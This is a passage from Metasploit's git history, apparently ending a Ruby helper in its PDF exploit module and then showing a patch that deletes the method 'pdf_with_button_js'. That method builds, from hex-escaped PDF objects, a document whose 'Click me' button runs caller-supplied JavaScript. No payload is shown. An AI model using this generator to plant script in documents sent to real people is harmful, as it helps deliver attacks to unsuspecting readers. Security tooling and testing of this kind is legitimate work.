x1a\x73\x4f\xe6\x31\xf3\x8a\xf2\x76\xe7\x3d\xcb\x8f\xcb\xef\xcf\x9f\x5c\xe4\xbb\x68\xd9\xa2\xf3\x5\xd6\x5\xea\x82\x23\x85\xa4\xc2\xbc\xc2\x9d\x85\xb3\x8b\xe3\x17\x6f\x5a\x3c\x5d\x14\x54\xd4\x55\x74\x7d\x89\x60\x49\xc3\x92\x73\x4b\xad\x97\x56\x2d\xfd\xa4\x98\x59\x2c\x2b\x3e\x54\x42\x28\xc9\x2f\xd9\x53\xf2\x83\x2c\x5d\x36\x2a\x9b\x2d\x95\x96\xbe\x57\x3a\x23\x97\xc8\x37\xcb\x1f\x2a\xa2\x15\x3\x8a\x7\xca\x8\x65\xbf\xf2\x5e\x59\x44\x59\x7f\xd9\x7d\x55\x84\x6a\xa3\xea\x41\x79\x54\xf9\x60\xf9\x23\xb5\x44\x3d\xac\xfe\xb6\x22\xa9\x62\x7b\xc5\xb3\xca\xf4\xca\xf\x2b\x7f\xac\xca\xaf\x3a\xa0\x21\x6b\x4a\x34\x47\xb5\x1c\x6d\xa5\xf6\x74\xb5\x7d\x75\x43\xf5\x25\x9d\x97\xae\x4b\x37\x59\x13\x56\xb3\xa9\x66\x46\x9f\xa2\xdf\x59\xb\xd5\x2e\xa9\x3d\x62\xe0\xe1\x3f\x53\x17\x8c\xee\xc6\x95\xc6\xa9\xba\xc8\xba\x91\xba\xe7\xf5\x79\xf5\x87\x1a\xd8\xd\xda\x86\xb\x8d\x9e\x8d\x6b\x1a\xef\x35\x25\x34\xfd\xa6\x19\x6d\x96\x37\x9f\x6c\x71\x6c\x69\x6f\x99\x5a\x16\xb3\x6c\x47\x2b\xd4\x5a\xda\x7a\xb2\xcd\xb9\xad\xb3\x6d\x7a\x79\xe2\xf2\x5d\xed\xd4\xf6\xca\xf6\x3f\x75\xf8\x75\xf4\x77\x7c\xbf\x22\x7f\xc5\xb1\x4e\xbb\xce\xe5\x9d\x77\x57\x26\xae\xdc\xdb\x65\xd6\xa5\xef\xba\xb1\x2a\x7c\xd5\xf6\xd5\xe8\x6a\xf5\xea\x89\x35\x1\x6b\xb6\xac\x79\xdd\xad\xe8\xfe\xa2\xc7\xaf\x67\xb0\xe7\x87\x5e\x79\xef\x17\x6b\x45\x6b\x87\xd6\xfe\xb8\xae\x6c\xdd\x44\x5f\x70\xdf\xb6\xf5\xc4\xf5\xda\xf5\xd7\x37\x44\x6d\xd8\xd5\xcf\xee\x6f\xea\xbf\xbb\x31\x6d\xe3\xe1\x1\x6c\xa0\x7b\xe0\xfb\x4d\xc5\x9b\xce\xd\x6\xe\x6e\xdf\x4c\xdd\x6c\xdc\x3c\x39\x94\xfa\x4f\x0\xa4\x1\x5b\xfe\x98\xb8\x99\x24\x99\x90\x99\xfc\x9a\x68\x9a\xd5\x9b\x42\x9b\xaf\x9c\x1c\x9c\x89\x9c\xf7\x9d\x64\x9d\xd2\x9e\x40\x9e\xae\x9f\x1d\x9f\x8b\x9f\xfa\xa0\x69\xa0\xd8\xa1\x47\xa1\xb6\xa2\x26\xa2\x96\xa3\x6\xa3\x76\xa3\xe6\xa4\x56\xa4\xc7\xa5\x38\xa5\xa9\xa6\x1a\xa6\x8b\xa6\xfd\xa7\x6e\xa7\xe0\xa8\x52\xa8\xc4\xa9\x37\xa9\xa9\xaa\x1c\xaa\x8f\xab\x2\xab\x75\xab\xe9\xac\x5c\xac\xd0\xad\x44\xad\xb8\xae\x2d\xae\xa1\xaf\x16\xaf\x8b\xb0\x0\xb0\x75\xb0\xea\xb1\x60\xb1\xd6\xb2\x4b\xb2\xc2\xb3\x38\xb3\xae\xb4\x25\xb4\x9c\xb5\x13\xb5\x8a\xb6\x1\xb6\x79\xb6\xf0\xb7\x68\xb7\xe0\xb8\x59\xb8\xd1\xb9\x4a\xb9\xc2\xba\x3b\xba\xb5\xbb\x2e\xbb\xa7\xbc\x21\xbc\x9b\xbd\x15\xbd\x8f\xbe\xd\xbe\x84\xbe\xff\xbf\x7a\xbf\xf5\xc0\x70\xc0\xec\xc1\x67\xc1\xe3\xc2\x5f\xc2\xdb\xc3\x58\xc3\xd4\xc4\x51\xc4\xce\xc5\x4b\xc5\xc8\xc6\x46\xc6\xc3\xc7\x41\xc7\xbf\xc8\x3d\xc8\xbc\xc9\x3a\xc9\xb9\xca\x38\xca\xb7\xcb\x36\xcb\xb6\xcc\x35\xcc\xb5\xcd\x35\xcd\xb5\xce\x36\xce\xb6\xcf\x37\xcf\xb8\xd0\x39\xd0\xba\xd1\x3c\xd1\xbe\xd2\x3f\xd2\xc1\xd3\x44\xd3\xc6\xd4\x49\xd4\xcb\xd5\x4e\xd5\xd1\xd6\x55\xd6\xd8\xd7\x5c\xd7\xe0\xd8\x64\xd8\xe8\xd9\x6c\xd9\xf1\xda\x76\xda\xfb\xdb\x80\xdc\x5\xdc\x8a\xdd\x10\xdd\x96\xde\x1c\xde\xa2\xdf\x29\xdf\xaf\xe0\x36\xe0\xbd\xe1\x44\xe1\xcc\xe2\x53\xe2\xdb\xe3\x63\xe3\xeb\xe4\x73\xe4\xfc\xe5\x84\xe6\xd\xe6\x96\xe7\x1f\xe7\xa9\xe8\x32\xe8\xbc\xe9\x46\xe9\xd0\xea\x5b\xea\xe5\xeb\x70\xeb\xfb\xec\x86\xed\x11\xed\x9c\xee\x28\xee\xb4\xef\x40\xef\xcc\xf0\x58\xf0\xe5\xf1\x72\xf1\xff\xf2\x8c\xf3\x19\xf3\xa7\xf4\x34\xf4\xc2\xf5\x50\xf5\xde\xf6\x6d\xf6\xfb\xf7\x8a\xf8\x19\xf8\xa8\xf9\x38\xf9\xc7\xfa\x57\xfa\xe7\xfb\x77\xfc\x7\xfc\x98\xfd\x29\xfd\xba\xfe\x4b\xfe\xdc\xff\x6d\xff\xff\x2\xc\x0\xf7\x84\xf3\xfb\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") + add_object(38, "\xd\x3c\x3c\x2f\x41\x20\x34\x33\x20\x30\x20\x52\x2f\x41\x50\x3c\x3c\x2f\x4e\x20\x35\x31\x20\x30\x20\x52\x3e\x3e\x2f\x44\x41\x28\x2f\x48\x65\x42\x6f\x20\x31\x32\x20\x54\x66\x20\x30\x20\x67\x29\x2f\x46\x20\x34\x2f\x46\x54\x2f\x42\x74\x6e\x2f\x46\x66\x20\x36\x35\x35\x33\x36\x2f\x4d\x4b\x3c\x3c\x2f\x42\x47\x5b\x31\x2e\x30\x20\x31\x2e\x30\x20\x31\x2e\x30\x5d\x2f\x43\x41\x28\x43\x6c\x69\x63\x6b\x20\x6d\x65\x29\x2f\x54\x50\x20\x31\x3e\x3e\x2f\x50\x20\x32\x36\x20\x30\x20\x52\x2f\x52\x65\x63\x74\x5b\x30\x2e\x30\x20\x30\x2e\x36\x31\x34\x38\x36\x38\x20\x36\x31\x31\x2e\x33\x38\x34\x20\x37\x39\x32\x2e\x30\x5d\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x57\x69\x64\x67\x65\x74\x2f\x54\x28\x62\x74\x6e\x43\x6c\x69\x63\x6b\x4d\x65\x29\x2f\x54\x55\x28\x43\x6c\x69\x63\x6b\x20\x6d\x65\x29\x2f\x54\x79\x70\x65\x2f\x41\x6e\x6e\x6f\x74\x3e\x3e\xd") + add_object(43, "\xd\x3c\x3c\x2f\x4a\x53\x20\x34\x36\x20\x30\x20\x52\x2f\x53\x2f\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\x3e\x3e\xd") + add_object(51, "\xd\x3c\x3c\x2f\x42\x42\x6f\x78\x5b\x30\x2e\x30\x20\x30\x2e\x30\x20\x36\x31\x31\x2e\x33\x38\x34\x20\x37\x39\x31\x2e\x33\x38\x35\x5d\x2f\x46\x6f\x72\x6d\x54\x79\x70\x65\x20\x31\x2f\x4c\x65\x6e\x67\x74\x68\x20\x36\x34\x2f\x4d\x61\x74\x72\x69\x78\x5b\x31\x2e\x30\x20\x30\x2e\x30\x20\x30\x2e\x30\x20\x31\x2e\x30\x20\x30\x2e\x30\x20\x30\x2e\x30\x5d\x2f\x52\x65\x73\x6f\x75\x72\x63\x65\x73\x3c\x3c\x2f\x50\x72\x6f\x63\x53\x65\x74\x5b\x2f\x50\x44\x46\x5d\x3e\x3e\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x46\x6f\x72\x6d\x2f\x54\x79\x70\x65\x2f\x58\x4f\x62\x6a\x65\x63\x74\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x31\x20\x67\xd\x30\x20\x30\x20\x36\x31\x31\x2e\x33\x38\x33\x38\x20\x37\x39\x31\x2e\x33\x38\x35\x31\x20\x72\x65\xd\x66\xd\x71\xd\x31\x20\x31\x20\x36\x30\x39\x2e\x33\x38\x33\x38\x20\x37\x38\x39\x2e\x33\x38\x35\x31\x20\x72\x65\xd\x57\xd\x6e\xd\x51\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") + + js = Zlib::Deflate.deflate(js) + add_object(46, "\x0d<</Filter[/FlateDecode]/Length #{js.length}>>stream\x0d#{js}\x0dendstream\x0d") + + add_object(8, "\xd\x3c\x3c\x2f\x43\x6f\x75\x6e\x74\x20\x31\x2f\x46\x69\x72\x73\x74\x20\x39\x20\x30\x20\x52\x2f\x4c\x61\x73\x74\x20\x39\x20\x30\x20\x52\x2f\x50\x61\x72\x65\x6e\x74\x20\x37\x20\x30\x20\x52\x2f\x54\x69\x74\x6c\x65\x28\x4c\x6f\x63\x61\x6c\x20\x44\x69\x73\x6b\x29\x3e\x3e\xd") + add_object(9, "\xd\x3c\x3c\x2f\x44\x65\x73\x74\x5b\x32\x36\x20\x30\x20\x52\x2f\x58\x59\x5a\x20\x30\x20\x37\x39\x32\x20\x6e\x75\x6c\x6c\x5d\x2f\x50\x61\x72\x65\x6e\x74\x20\x38\x20\x30\x20\x52\x2f\x53\x45\x20\x31\x35\x20\x30\x20\x52\x2f\x54\x69\x74\x6c\x65\x28\xfe\xff\x0\x6a\x0\x73\x0\x2e\x0\x74\x0\x78\x0\x74\x29\x3e\x3e\xd") + add_object(17, "\xd\x3c\x3c\x2f\x4e\x61\x6d\x65\x73\x5b\x33\x35\x20\x30\x20\x52\x20\x32\x30\x20\x30\x20\x52\x5d\x3e\x3e\xd") + add_object(18, "\xd\x3c\x3c\x2f\x4e\x61\x6d\x65\x73\x5b\x31\x39\x20\x30\x20\x52\x20\x32\x30\x20\x30\x20\x52\x5d\x3e\x3e\xd") + add_object(19, "\xd\x28\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\x43\x7c\x2f\x74\x65\x6d\x70\x2f\x6a\x73\x2e\x74\x78\x74\x29\xd") + add_object(20, "\xd\x3c\x3c\x2f\x43\x54\x28\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x29\x2f\x49\x44\x20\x33\x35\x20\x30\x20\x52\x2f\x4f\x5b\x32\x36\x20\x30\x20\x52\x5d\x2f\x53\x2f\x53\x50\x53\x2f\x53\x49\x20\x32\x31\x20\x30\x20\x52\x2f\x54\x28\xfe\xff\x0\x6a\x0\x73\x0\x2e\x0\x74\x0\x78\x0\x74\x29\x2f\x54\x53\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x31\x33\x35\x35\x32\x5a\x29\x3e\x3e\xd") + add_object(21, "\xd\x3c\x3c\x2f\x41\x55\x20\x31\x39\x20\x30\x20\x52\x2f\x54\x53\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x31\x33\x35\x35\x32\x5a\x29\x3e\x3e\xd") + add_object(39, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x48\x65\x6c\x76\x65\x74\x69\x63\x61\x2d\x42\x6f\x6c\x64\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x2f\x48\x65\x42\x6f\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") + add_object(47, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x48\x65\x6c\x76\x65\x74\x69\x63\x61\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x2f\x48\x65\x6c\x76\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") + add_object(48, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x5a\x61\x70\x66\x44\x69\x6e\x67\x62\x61\x74\x73\x2f\x4e\x61\x6d\x65\x2f\x5a\x61\x44\x62\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") + add_object(45, "\xd\x3c\x3c\x2f\x44\x69\x66\x66\x65\x72\x65\x6e\x63\x65\x73\x5b\x32\x34\x2f\x62\x72\x65\x76\x65\x2f\x63\x61\x72\x6f\x6e\x2f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x64\x6f\x74\x61\x63\x63\x65\x6e\x74\x2f\x68\x75\x6e\x67\x61\x72\x75\x6d\x6c\x61\x75\x74\x2f\x6f\x67\x6f\x6e\x65\x6b\x2f\x72\x69\x6e\x67\x2f\x74\x69\x6c\x64\x65\x20\x33\x39\x2f\x71\x75\x6f\x74\x65\x73\x69\x6e\x67\x6c\x65\x20\x39\x36\x2f\x67\x72\x61\x76\x65\x20\x31\x32\x38\x2f\x62\x75\x6c\x6c\x65\x74\x2f\x64\x61\x67\x67\x65\x72\x2f\x64\x61\x67\x67\x65\x72\x64\x62\x6c\x2f\x65\x6c\x6c\x69\x70\x73\x69\x73\x2f\x65\x6d\x64\x61\x73\x68\x2f\x65\x6e\x64\x61\x73\x68\x2f\x66\x6c\x6f\x72\x69\x6e\x2f\x66\x72\x61\x63\x74\x69\x6f\x6e\x2f\x67\x75\x69\x6c\x73\x69\x6e\x67\x6c\x6c\x65\x66\x74\x2f\x67\x75\x69\x6c\x73\x69\x6e\x67\x6c\x72\x69\x67\x68\x74\x2f\x6d\x69\x6e\x75\x73\x2f\x70\x65\x72\x74\x68\x6f\x75\x73\x61\x6e\x64\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x62\x61\x73\x65\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x6c\x65\x66\x74\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x72\x69\x67\x68\x74\x2f\x71\x75\x6f\x74\x65\x6c\x65\x66\x74\x2f\x71\x75\x6f\x74\x65\x72\x69\x67\x68\x74\x2f\x71\x75\x6f\x74\x65\x73\x69\x6e\x67\x6c\x62\x61\x73\x65\x2f\x74\x72\x61\x64\x65\x6d\x61\x72\x6b\x2f\x66\x69\x2f\x66\x6c\x2f\x4c\x73\x6c\x61\x73\x68\x2f\x4f\x45\x2f\x53\x63\x61\x72\x6f\x6e\x2f\x59\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x5a\x63\x61\x72\x6f\x6e\x2f\x64\x6f\x74\x6c\x65\x73\x73\x69\x2f\x6c\x73\x6c\x61\x73\x68\x2f\x6f\x65\x2f\x73\x63\x61\x72\x6f\x6e\x2f\x7a\x63\x61\x72\x6f\x6e\x20\x31\x36\x30\x2f\x45\x75\x72\x6f\x20\x31\x36\x34\x2f\x63\x75\x72\x72\x65\x6e\x63\x79\x20\x31\x36\x36\x2f\x62\x72\x6f\x6b\x65\x6e\x62\x61\x72\x20\x31\x36\x38\x2f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x63\x6f\x70\x79\x72\x69\x67\x68\x74\x2f\x6f\x72\x64\x66\x65\x6d\x69\x6e\x69\x6e\x65\x20\x31\x37\x32\x2f\x6c\x6f\x67\x69\x63\x61\x6c\x6e\x6f\x74\x2f\x2e\x6e\x6f\x74\x64\x65\x66\x2f\x72\x65\x67\x69\x73\x74\x65\x72\x65\x64\x2f\x6d\x61\x63\x72\x6f\x6e\x2f\x64\x65\x67\x72\x65\x65\x2f\x70\x6c\x75\x73\x6d\x69\x6e\x75\x73\x2f\x74\x77\x6f\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x74\x68\x72\x65\x65\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x61\x63\x75\x74\x65\x2f\x6d\x75\x20\x31\x38\x33\x2f\x70\x65\x72\x69\x6f\x64\x63\x65\x6e\x74\x65\x72\x65\x64\x2f\x63\x65\x64\x69\x6c\x6c\x61\x2f\x6f\x6e\x65\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x6f\x72\x64\x6d\x61\x73\x63\x75\x6c\x69\x6e\x65\x20\x31\x38\x38\x2f\x6f\x6e\x65\x71\x75\x61\x72\x74\x65\x72\x2f\x6f\x6e\x65\x68\x61\x6c\x66\x2f\x74\x68\x72\x65\x65\x71\x75\x61\x72\x74\x65\x72\x73\x20\x31\x39\x32\x2f\x41\x67\x72\x61\x76\x65\x2f\x41\x61\x63\x75\x74\x65\x2f\x41\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x41\x74\x69\x6c\x64\x65\x2f\x41\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x41\x72\x69\x6e\x67\x2f\x41\x45\x2f\x43\x63\x65\x64\x69\x6c\x6c\x61\x2f\x45\x67\x72\x61\x76\x65\x2f\x45\x61\x63\x75\x74\x65\x2f\x45\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x45\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x49\x67\x72\x61\x76\x65\x2f\x49\x61\x63\x75\x74\x65\x2f\x49\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x49\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x45\x74\x68\x2f\x4e\x74\x69\x6c\x64\x65\x2f\x4f\x67\x72\x61\x76\x65\x2f\x4f\x61\x63\x75\x74\x65\x2f\x4f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x4f\x74\x69\x6c\x64\x65\x2f\x4f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x6d\x75\x6c\x74\x69\x70\x6c\x79\x2f\x4f\x73\x6c\x61\x73\x68\x2f\x55\x67\x72\x61\x76\x65\x2f\x55\x61\x63\x75\x74\x65\x2f\x55\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x55\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x59\x61\x63\x75\x74\x65\x2f\x54\x68\x6f\x72\x6e\x2f\x67\x65\x72\x6d\x61\x6e\x64\x62\x6c\x73\x2f\x61\x67\x72\x61\x76\x65\x2f\x61\x61\x63\x75\x74\x65\x2f\x61\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x61\x74\x69\x6c\x64\x65\x2f\x61\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x61\x72\x69\x6e\x67\x2f\x61\x65\x2f\x63\x63\x65\x64\x69\x6c\x6c\x61\x2f\x65\x67\x72\x61\x76\x65\x2f\x65\x61\x63\x75\x74\x65\x2f\x65\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x65\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x69\x67\x72\x61\x76\x65\x2f\x69\x61\x63\x75\x74\x65\x2f\x69\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x69\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x65\x74\x68\x2f\x6e\x74\x69\x6c\x64\x65\x2f\x6f\x67\x72\x61\x76\x65\x2f\x6f\x61\x63\x75\x74\x65\x2f\x6f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x6f\x74\x69\x6c\x64\x65\x2f\x6f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x64\x69\x76\x69\x64\x65\x2f\x6f\x73\x6c\x61\x73\x68\x2f\x75\x67\x72\x61\x76\x65\x2f\x75\x61\x63\x75\x74\x65\x2f\x75\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x75\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x79\x61\x63\x75\x74\x65\x2f\x74\x68\x6f\x72\x6e\x2f\x79\x64\x69\x65\x72\x65\x73\x69\x73\x5d\x2f\x54\x79\x70\x65\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3e\x3e\xd") + add_object(23, "\xd\x3c\x3c\x2f\x43\x72\x65\x61\x74\x69\x6f\x6e\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x33\x33\x35\x35\x31\x2b\x30\x32\x27\x30\x30\x27\x29\x2f\x43\x72\x65\x61\x74\x6f\x72\x28\x41\x64\x6f\x62\x65\x20\x41\x63\x72\x6f\x62\x61\x74\x20\x31\x31\x2e\x30\x29\x2f\x4d\x6f\x64\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x35\x33\x31\x31\x32\x31\x34\x32\x36\x2d\x30\x35\x27\x30\x30\x27\x29\x2f\x50\x72\x6f\x64\x75\x63\x65\x72\x28\x41\x63\x72\x6f\x62\x61\x74\x20\x57\x65\x62\x20\x43\x61\x70\x74\x75\x72\x65\x20\x31\x31\x2e\x30\x29\x2f\x54\x69\x74\x6c\x65\x28\x6a\x73\x2e\x74\x78\x74\x29\x3e\x3e\xd") + + @xref_offset = @pdf.length + @pdf << xref_table << trailer(25, eol) << startxref + + @pdf + end + +end From 09e965d54e238a4b739a37727c2960e773569b98 Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Sat, 31 May 2014 16:12:59 -0500 Subject: [PATCH 459/853] Remove extraneous method from pdf.rb --- lib/msf/core/exploit/pdf.rb | 56 ------------------------------------- 1 file changed, 56 deletions(-) diff --git a/lib/msf/core/exploit/pdf.rb b/lib/msf/core/exploit/pdf.rb index 9412ad4b67..19b9a9204a 100644 --- a/lib/msf/core/exploit/pdf.rb +++ b/lib/msf/core/exploit/pdf.rb @@ -340,61 +340,5 @@ module Exploit::PDF finish_pdf end - ## - #Create PDF with a button onclick - ## - def pdf_with_button_js(js) - @xref = {} - @pdf = header('1.6') - - add_object(25, "\xd\x3c\x3c\x2f\x41\x63\x72\x6f\x46\x6f\x72\x6d\x20\x34\x30\x20\x30\x20\x52\x2f\x4d\x65\x74\x61\x64\x61\x74\x61\x20\x33\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x73\x20\x33\x32\x20\x30\x20\x52\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x20\x37\x20\x30\x20\x52\x2f\x50\x61\x67\x65\x73\x20\x31\x36\x20\x30\x20\x52\x2f\x53\x70\x69\x64\x65\x72\x49\x6e\x66\x6f\x20\x32\x32\x20\x30\x20\x52\x2f\x53\x74\x72\x75\x63\x74\x54\x72\x65\x65\x52\x6f\x6f\x74\x20\x31\x30\x20\x30\x20\x52\x2f\x54\x79\x70\x65\x2f\x43\x61\x74\x61\x6c\x6f\x67\x3e\x3e\xd") - add_object(40, "\xd\x3c\x3c\x2f\x44\x41\x28\x2f\x48\x65\x6c\x76\x20\x30\x20\x54\x66\x20\x30\x20\x67\x20\x29\x2f\x44\x52\x3c\x3c\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3c\x3c\x2f\x50\x44\x46\x44\x6f\x63\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x3e\x3e\x2f\x46\x6f\x6e\x74\x3c\x3c\x2f\x48\x65\x42\x6f\x20\x33\x39\x20\x30\x20\x52\x2f\x48\x65\x6c\x76\x20\x34\x37\x20\x30\x20\x52\x2f\x5a\x61\x44\x62\x20\x34\x38\x20\x30\x20\x52\x3e\x3e\x3e\x3e\x2f\x46\x69\x65\x6c\x64\x73\x5b\x33\x38\x20\x30\x20\x52\x5d\x3e\x3e\xd") - add_object(3, "\xd\x3c\x3c\x2f\x4c\x65\x6e\x67\x74\x68\x20\x33\x33\x31\x33\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x58\x4d\x4c\x2f\x54\x79\x70\x65\x2f\x4d\x65\x74\x61\x64\x61\x74\x61\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x3c\x3f\x78\x70\x61\x63\x6b\x65\x74\x20\x62\x65\x67\x69\x6e\x3d\x22\xef\xbb\xbf\x22\x20\x69\x64\x3d\x22\x57\x35\x4d\x30\x4d\x70\x43\x65\x68\x69\x48\x7a\x72\x65\x53\x7a\x4e\x54\x63\x7a\x6b\x63\x39\x64\x22\x3f\x3e\xd\x3c\x78\x3a\x78\x6d\x70\x6d\x65\x74\x61\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x3d\x22\x61\x64\x6f\x62\x65\x3a\x6e\x73\x3a\x6d\x65\x74\x61\x2f\x22\x20\x78\x3a\x78\x6d\x70\x74\x6b\x3d\x22\x41\x64\x6f\x62\x65\x20\x58\x4d\x50\x20\x43\x6f\x72\x65\x20\x35\x2e\x34\x2d\x63\x30\x30\x35\x20\x37\x38\x2e\x31\x34\x37\x33\x32\x36\x2c\x20\x32\x30\x31\x32\x2f\x30\x38\x2f\x32\x33\x2d\x31\x33\x3a\x30\x33\x3a\x30\x33\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3e\xd\x20\x20\x20\x3c\x72\x64\x66\x3a\x52\x44\x46\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x3e\xd\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x20\x72\x64\x66\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x6d\x70\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x78\x61\x70\x2f\x31\x2e\x30\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\x2e\x31\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x6d\x70\x4d\x4d\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x78\x61\x70\x2f\x31\x2e\x30\x2f\x6d\x6d\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x70\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x70\x64\x66\x2f\x31\x2e\x33\x2f\x22\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x4d\x6f\x64\x69\x66\x79\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x35\x2d\x33\x31\x54\x31\x32\x3a\x31\x34\x3a\x32\x36\x2d\x30\x35\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x4d\x6f\x64\x69\x66\x79\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x65\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x33\x2d\x33\x31\x54\x31\x33\x3a\x33\x35\x3a\x35\x31\x2b\x30\x32\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x65\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x4d\x65\x74\x61\x64\x61\x74\x61\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x35\x2d\x33\x31\x54\x31\x32\x3a\x31\x34\x3a\x32\x36\x2d\x30\x35\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x4d\x65\x74\x61\x64\x61\x74\x61\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x6f\x72\x54\x6f\x6f\x6c\x3e\x41\x64\x6f\x62\x65\x20\x41\x63\x72\x6f\x62\x61\x74\x20\x31\x31\x2e\x30\x3c\x2f\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x6f\x72\x54\x6f\x6f\x6c\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x61\x70\x70\x6c\x69\